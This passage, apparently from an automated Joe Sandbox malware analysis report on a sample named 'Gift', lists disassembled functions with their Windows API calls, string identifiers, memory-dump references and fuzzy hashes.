                                                                          • IsWindow.USER32(?), ref: 003266BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Foreground_memmove
                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                          • API String ID: 3828923867-1919597938
                                                                          • Opcode ID: b3816e02694d571501d90adfe3b5ae962fa92c1aa07bef456c36579cb214f14a
                                                                          • Instruction ID: 220eb33188f91193f4a85e7d8428df68b4c9c7e769dab70fa7993d82e8c2eba3
                                                                          • Opcode Fuzzy Hash: b3816e02694d571501d90adfe3b5ae962fa92c1aa07bef456c36579cb214f14a
                                                                          • Instruction Fuzzy Hash: 0FD10330114756DBDB06EF20D4829AAFBB4FF44344F604A29F595435A2DB30E969CF92
                                                                          Function 0035441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 003544AC
                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0035456C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                          • API String ID: 3974292440-719923060
                                                                          • Opcode ID: 4a8ed7181b248ac1287fc95df92a9fedd3974fd3b9e80de3e67b90f5685afd04
                                                                          • Instruction ID: 4fe734dc416470e77645dcd7e218226186a7f8fc1b52192ef505e3efc9973e8b
                                                                          • Opcode Fuzzy Hash: 4a8ed7181b248ac1287fc95df92a9fedd3974fd3b9e80de3e67b90f5685afd04
                                                                          • Instruction Fuzzy Hash: 83A191302243119FDB19EF20C851E7AB3A5FF89319F108969F8565B7A2DB30EC59CB51
                                                                          Function 003456C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003456E1
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 003456EC
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003456F7
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00345702
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0034570D
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00345718
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00345723
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0034572E
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00345739
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00345744
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0034574F
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0034575A
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00345765
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00345770
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0034577B
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00345786
                                                                          • GetCursorInfo.USER32(?), ref: 00345796
                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 003457C1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          • Opcode ID: b9a12d037379bfee4c998ff39e36f251b0ae4fc17d3ad02f463a4a039c2f69a2
                                                                          • Instruction ID: 7b06eabf5476218eca4223aa05f64cdf3f55d32fa3430463b89f07baab2d8436
                                                                          • Opcode Fuzzy Hash: b9a12d037379bfee4c998ff39e36f251b0ae4fc17d3ad02f463a4a039c2f69a2
                                                                          • Instruction Fuzzy Hash: 35417370E44319ABDB119FBA8C49D6FFEF8EF41B10B10452FE109EB291DAB8A500CE51
                                                                          Function 0032B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032B17B
                                                                          • __swprintf.LIBCMT ref: 0032B21C
                                                                          • _wcscmp.LIBCMT ref: 0032B22F
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0032B284
                                                                          • _wcscmp.LIBCMT ref: 0032B2C0
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0032B2F7
                                                                          • GetDlgCtrlID.USER32(?), ref: 0032B349
                                                                          • GetWindowRect.USER32(?,?), ref: 0032B37F
                                                                          • GetParent.USER32(?), ref: 0032B39D
                                                                          • ScreenToClient.USER32(00000000), ref: 0032B3A4
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032B41E
                                                                          • _wcscmp.LIBCMT ref: 0032B432
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0032B458
                                                                          • _wcscmp.LIBCMT ref: 0032B46C
                                                                            • Part of subcall function 002F385C: _iswctype.LIBCMT ref: 002F3864
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: e8ba49596d343ea6a08cf815df43db955fd5624d0c577fb6b5fe988895b5197e
                                                                          • Instruction ID: 30fcec9c9985c264a5d00e4a3075eeda506482f4a2a806f9e5f66c2b40a352c1
                                                                          • Opcode Fuzzy Hash: e8ba49596d343ea6a08cf815df43db955fd5624d0c577fb6b5fe988895b5197e
                                                                          • Instruction Fuzzy Hash: EFA1F271204326EFD71AEF20D895BAAF7E8FF44350F108529FA99C2191DB30E955CBA1
                                                                          Function 0032BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0032BAB1
                                                                          • _wcscmp.LIBCMT ref: 0032BAC2
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0032BAEA
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0032BB07
                                                                          • _wcscmp.LIBCMT ref: 0032BB25
                                                                          • _wcsstr.LIBCMT ref: 0032BB36
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0032BB6E
                                                                          • _wcscmp.LIBCMT ref: 0032BB7E
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0032BBA5
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0032BBEE
                                                                          • _wcscmp.LIBCMT ref: 0032BBFE
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0032BC26
                                                                          • GetWindowRect.USER32(00000004,?), ref: 0032BC8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: 95c85dc0997bef2688f83033b968027c004382fcd681ffce7363774624647efd
                                                                          • Instruction ID: ab986510f03c3b0fa1e9b0e03c6da517fc185c5605bdae0888ad1dd8f7875801
                                                                          • Opcode Fuzzy Hash: 95c85dc0997bef2688f83033b968027c004382fcd681ffce7363774624647efd
                                                                          • Instruction Fuzzy Hash: 9081CF7100432A9BDB06DF10E885FAAB7ECFF44314F04846AFD898A096DB30DD55CBA1
                                                                          Function 0032B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
                                                                          • Opcode ID: f6aac42419c19f1ead4560c2bb48c0446bed0c0da0e8df5dbd27c61597931c15
                                                                          • Instruction ID: ab5a182a50f9dcb6834aa61814c9bdca58e64e48e1ca0da80d0435f39ce247d8
                                                                          • Opcode Fuzzy Hash: f6aac42419c19f1ead4560c2bb48c0446bed0c0da0e8df5dbd27c61597931c15
                                                                          • Instruction Fuzzy Hash: 4F31EA30590719A6EB06FB61DD43EFDB3B4AF10790FA00136F651B10D5EF656E24CA52
                                                                          Function 0032CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(00000063), ref: 0032CBAA
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0032CBBC
                                                                          • SetWindowTextW.USER32(?,?), ref: 0032CBD3
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0032CBE8
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0032CBEE
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0032CBFE
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0032CC04
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0032CC25
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0032CC3F
                                                                          • GetWindowRect.USER32(?,?), ref: 0032CC48
                                                                          • SetWindowTextW.USER32(?,?), ref: 0032CCB3
                                                                          • GetDesktopWindow.USER32 ref: 0032CCB9
                                                                          • GetWindowRect.USER32(00000000), ref: 0032CCC0
                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0032CD0C
                                                                          • GetClientRect.USER32(?,?), ref: 0032CD19
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0032CD3E
                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0032CD69
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: c073ddc006d58b9abd50f6e70ef36eeb756704847f33c90b5459a74709a5daa4
                                                                          • Instruction ID: 9345b27c0b00116a7814c2cbc2c242132a73caf15742102ee3bdb9e682381653
                                                                          • Opcode Fuzzy Hash: c073ddc006d58b9abd50f6e70ef36eeb756704847f33c90b5459a74709a5daa4
                                                                          • Instruction Fuzzy Hash: 78517170900719EFDB26DFA8DE86B6FBBF9FF04705F004918E586A25A0C7B4A915CB50
                                                                          Function 0035A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0035A87E
                                                                          • DestroyWindow.USER32(?,?), ref: 0035A8F8
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0035A972
                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0035A994
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035A9A7
                                                                          • DestroyWindow.USER32(00000000), ref: 0035A9C9
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002D0000,00000000), ref: 0035AA00
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035AA19
                                                                          • GetDesktopWindow.USER32 ref: 0035AA32
                                                                          • GetWindowRect.USER32(00000000), ref: 0035AA39
                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0035AA51
                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0035AA69
                                                                            • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                          • String ID: 0$tooltips_class32
                                                                          • API String ID: 1297703922-3619404913
                                                                          • Opcode ID: b2cb03d40de4d9496e6c8e9aa098c1c0ad5f13f1fecfe447c7d3597c594031e9
                                                                          • Instruction ID: 8a8c92c0184e0e630f75624bec8319d519626e2954a9adcd7b42358eb0dbfe37
                                                                          • Opcode Fuzzy Hash: b2cb03d40de4d9496e6c8e9aa098c1c0ad5f13f1fecfe447c7d3597c594031e9
                                                                          • Instruction Fuzzy Hash: E271BC70154604AFE726CF28CC49FAB77E9FB88301F05461DF986872A0D771E919DB62
                                                                          Function 0035CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0035CCCF
                                                                            • Part of subcall function 0035B1A9: ClientToScreen.USER32(?,?), ref: 0035B1D2
                                                                            • Part of subcall function 0035B1A9: GetWindowRect.USER32(?,?), ref: 0035B248
                                                                            • Part of subcall function 0035B1A9: PtInRect.USER32(?,?,0035C6BC), ref: 0035B258
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0035CD38
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0035CD43
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0035CD66
                                                                          • _wcscat.LIBCMT ref: 0035CD96
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0035CDAD
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0035CDC6
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0035CDDD
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0035CDFF
                                                                          • DragFinish.SHELL32(?), ref: 0035CE06
                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0035CEF9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                          • API String ID: 169749273-3440237614
                                                                          • Opcode ID: bd327064442c3b1b4cffaa2945b33a4a19cde194620b7c78ce9119fd07c03b13
                                                                          • Instruction ID: f814c0c96f2f017d83c631912952e53fff6f69176d67ce45e231c0affdb72c80
                                                                          • Opcode Fuzzy Hash: bd327064442c3b1b4cffaa2945b33a4a19cde194620b7c78ce9119fd07c03b13
                                                                          • Instruction Fuzzy Hash: 25616A71118301AFC716EF50DC86D9FBBF8EF89750F000A2EF595922A1DB709A59CB62
                                                                          Function 003382D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0033831A
                                                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00338323
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0033832F
                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0033841D
                                                                          • __swprintf.LIBCMT ref: 0033844D
                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00338479
                                                                          • VariantInit.OLEAUT32(?), ref: 0033852A
                                                                          • SysFreeString.OLEAUT32(?), ref: 003385BE
                                                                          • VariantClear.OLEAUT32(?), ref: 00338618
                                                                          • VariantClear.OLEAUT32(?), ref: 00338627
                                                                          • VariantInit.OLEAUT32(00000000), ref: 00338665
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                          • API String ID: 3730832054-3931177956
                                                                          • Opcode ID: d1ecb59bef4292e8d2f0e5b539194d84a94c0ed062cbd13eeb7f7df8afbca67e
                                                                          • Instruction ID: 1d156a76f942afd0a569fdb3eb827540aff04b247c98f979238517004bbf1ea1
                                                                          • Opcode Fuzzy Hash: d1ecb59bef4292e8d2f0e5b539194d84a94c0ed062cbd13eeb7f7df8afbca67e
                                                                          • Instruction Fuzzy Hash: 9FD10F79604215EBDB229F62C8C5BBEB7B8BF05B10F248555F405AB691CF30EC90DBA0
                                                                          Function 003549CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00354A61
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00354AAC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: e6ac3f80436abea7a45d5d469f7195a1dca4b437b941d1481c900b647fff9e95
                                                                          • Instruction ID: 8ebcfe78f87ed7d4a5bac9a1927f6e640c7f0f3a2b4b3aa8fdcc1b440f870fda
                                                                          • Opcode Fuzzy Hash: e6ac3f80436abea7a45d5d469f7195a1dca4b437b941d1481c900b647fff9e95
                                                                          • Instruction Fuzzy Hash: 36919F342107119BCB1AEF20C451A69B7A6EF84358F108869FC965B7A3DB30ED99CF91
                                                                          Function 0033E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 0033E31F
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0033E32F
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0033E33B
                                                                          • __wsplitpath.LIBCMT ref: 0033E399
                                                                          • _wcscat.LIBCMT ref: 0033E3B1
                                                                          • _wcscat.LIBCMT ref: 0033E3C3
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0033E3D8
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0033E3EC
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0033E41E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0033E43F
                                                                          • _wcscpy.LIBCMT ref: 0033E44B
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0033E48A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 3566783562-438819550
                                                                          • Opcode ID: 6f60daf3ae5d2e1a96815cb78713edc3a8e07e0ff753839f94eec0a1479782c3
                                                                          • Instruction ID: 8d28d449649664e41a4bf9f3d773f5a1c6571622f26f0749e39866e9eade8441
                                                                          • Opcode Fuzzy Hash: 6f60daf3ae5d2e1a96815cb78713edc3a8e07e0ff753839f94eec0a1479782c3
                                                                          • Instruction Fuzzy Hash: 406158725142059FCB11EF60C885AAFB3E8BF89310F04892EF989C7251DB35E955CF92
                                                                          Function 002D23F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2412,?,00000000,?,?,?,?,002D1AA7,00000000,?), ref: 002D1F76
